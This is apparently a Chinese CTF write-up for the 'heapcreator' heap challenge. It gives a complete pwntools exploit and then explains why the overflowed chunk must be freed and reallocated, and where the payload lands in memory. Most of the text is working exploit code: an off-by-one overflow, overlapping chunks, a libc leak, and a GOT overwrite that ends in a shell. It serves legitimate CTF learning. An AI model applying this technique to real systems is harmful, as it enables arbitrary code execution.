hitcontraining_heapcreator 一点小疑惑
exp:
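"""Exploit for hitcontraining heapcreator (BUUOJ "heapcreator").

Attack flow (unchanged from the original script):
  1. create four records; heap[0]'s content is 0x18 bytes, so a one-byte
     overflow from edit(0) reaches the size field of the next chunk and
     sets it to 0x81;
  2. delete(1) hands that enlarged chunk back to the allocator;
  3. create(0x70, ...) gets the enlarged chunk back as heap[1]'s content,
     so heap[1] now has a *recorded* size of 0x70 and its content overlaps
     heap[2]'s bookkeeping record (size, content pointer) 0x40 bytes in;
  4. the payload rewrites that record to (size = 8, content = free@GOT);
  5. show(2) leaks free@libc, edit(2) writes system@libc over free@GOT,
     and delete(3) therefore ends up as system("/bin/sh").

Step 5 needs a writable GOT (checksec: not Full RELRO); the original
exploit relies on that, it is not verified here.

Usage (pwntools `args` flags):
    python3 exp.py           local ./heapcreator
    python3 exp.py REMOTE    node3.buuoj.cn:25984
    python3 exp.py GDB       attach gdb before the leak (local runs only)
"""
from pwn import *
from LibcSearcher import LibcSearcher

BINARY = "./heapcreator"
REMOTE_HOST, REMOTE_PORT = "node3.buuoj.cn", 25984

elf = ELF(BINARY)
sh = remote(REMOTE_HOST, REMOTE_PORT) if args.REMOTE else process(BINARY)


def _choose(option: bytes) -> None:
    """Wait for the main menu prompt and send `option`."""
    sh.recvuntil(b"Your choice :")
    sh.sendline(option)


def _index(index: int) -> None:
    """Answer the "Index :" prompt with `index`."""
    sh.recvuntil(b"Index :")
    sh.sendline(str(int(index)).encode())


def create(length: int, value: bytes) -> None:
    """Menu 1: allocate a record whose content buffer is `length` bytes.

    All payloads are bytes on purpose: sending str through pwntools relies
    on its auto-encoding (and warns), and b"\\x81" must stay a single byte.
    """
    _choose(b"1")
    sh.recvuntil(b"Size of Heap : ")
    sh.sendline(str(int(length)).encode())
    sh.recvuntil(b"Content of heap:")
    sh.sendline(value)


def edit(index: int, value: bytes) -> None:
    """Menu 2: overwrite record `index`'s content (bounded by its recorded size)."""
    _choose(b"2")
    _index(index)
    sh.recvuntil(b"Content of heap : ")
    sh.sendline(value)


def show(index: int) -> None:
    """Menu 3: print record `index`; the caller parses the output."""
    _choose(b"3")
    _index(index)


def delete(index: int) -> None:
    """Menu 4: free record `index`."""
    _choose(b"4")
    _index(index)


# --- 1. lay out the heap ------------------------------------------------------
create(0x18, b"aaaa")      # heap[0]: 0x18 bytes -> off-by-one into the next size field
create(0x10, b"bbbb")      # heap[1]: victim whose chunk size byte becomes 0x81
create(0x10, b"cccc")      # heap[2]: its (size, pointer) record gets hijacked
create(0x10, b"/bin/sh")   # heap[3]: delete(3) becomes system("/bin/sh")

# --- 2. one-byte overflow into the next chunk's size field (-> 0x81) ----------
edit(0, b"a" * 0x18 + b"\x81")

# --- 3. free and re-take the enlarged chunk -----------------------------------
# edit() is limited by the size the program recorded for heap[1] (0x10), not
# by the malloc size field we just changed, so free the chunk and get it back
# with a 0x70 request: the new record has size 0x70 and its content overlaps
# heap[2]'s (size, pointer) record 0x40 bytes in. Per the writeup the 0x40 of
# padding also runs over heap[1]'s own record, so heap[1] is never used again.
delete(1)
fake_size = p64(8)                       # heap[2]->size: exactly one pointer
payload = b"d" * 0x40 + fake_size + p64(elf.got["free"])
create(0x70, payload)

# Debug hook only on request; an unconditional gdb.attach() blocks every run.
if args.GDB and not args.REMOTE:
    gdb.attach(sh)

# --- 4. leak free@libc through heap[2] ----------------------------------------
show(2)
sh.recvuntil(b"Content : ")
leak = sh.recvuntil(b"Done")[:-5]        # strip the trailing "\nDone"
if not leak or len(leak) > 8:
    log.error("unexpected leak %r", leak)   # log.error raises; do not continue blind
free_addr = u64(leak.ljust(8, b"\x00"))
if free_addr == 0:
    log.error("free@libc leaked as 0")
log.info("free@libc = %#x", free_addr)

# LibcSearcher matches on the low bits of free's address; it may offer several
# candidate libcs and the offsets are only right for the one really in use.
libc = LibcSearcher("free", free_addr)
libc_base = free_addr - libc.dump("free")
system_addr = libc_base + libc.dump("system")
log.info("system@libc = %#x", system_addr)

# --- 5. free@GOT <- system; delete(3) then runs system("/bin/sh") -------------
# NOTE(review): edit(2) is an 8-byte write but sendline appends "\n"; the
# original worked this way, so the extra byte is presumably harmless here.
edit(2, p64(system_addr))
delete(3)
sh.interactive()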
1. 为什么要先把 chunk1 释放掉再重新 malloc，然后才填入数据，而不是直接往 chunk1 里填入数据？
假如直接填入数据的话,改变一下exp
然后查看堆发现
chunk1 在程序里记录的 size 没有变（溢出改掉的只是下一个 chunk 头部的 size 字段，被写成了 0x81），而 edit 能写入多少字节是由记录的 size 决定的，所以最多还是只能输入 0x10 大小的数据。因此我们要先 free 掉 chunk1，让这个被改大的 chunk 回到分配器，再 malloc(0x70) 把它重新拿回来，让新记录的 size 变成 0x70，然后再填充数据，这样 0x70 字节的写入才能覆盖到后面 chunk2 的管理结构（size 和内容指针）。
2.如图
为什么填入的数据会从0x1616050开始?
因为每次 add 都会 malloc 两次，也就是创建两个 chunk：第一个是管理结构体（保存 size 和内容指针），重新 create 之后它落在 0x1616070 处，随后会被 payload 开头的 0x40 个 'd' 覆盖掉（0x1616050 + 0x40 = 0x1616090，正好跨过它），所以我才会有这个疑问；第二个 chunk，也就是填入数据的 chunk，就是那个被改大的 chunk，位于 0x1616040：0x1616048 是它的 size 字段，0x1616050 才是数据存储的地方，所以填入的数据从 0x1616050 开始。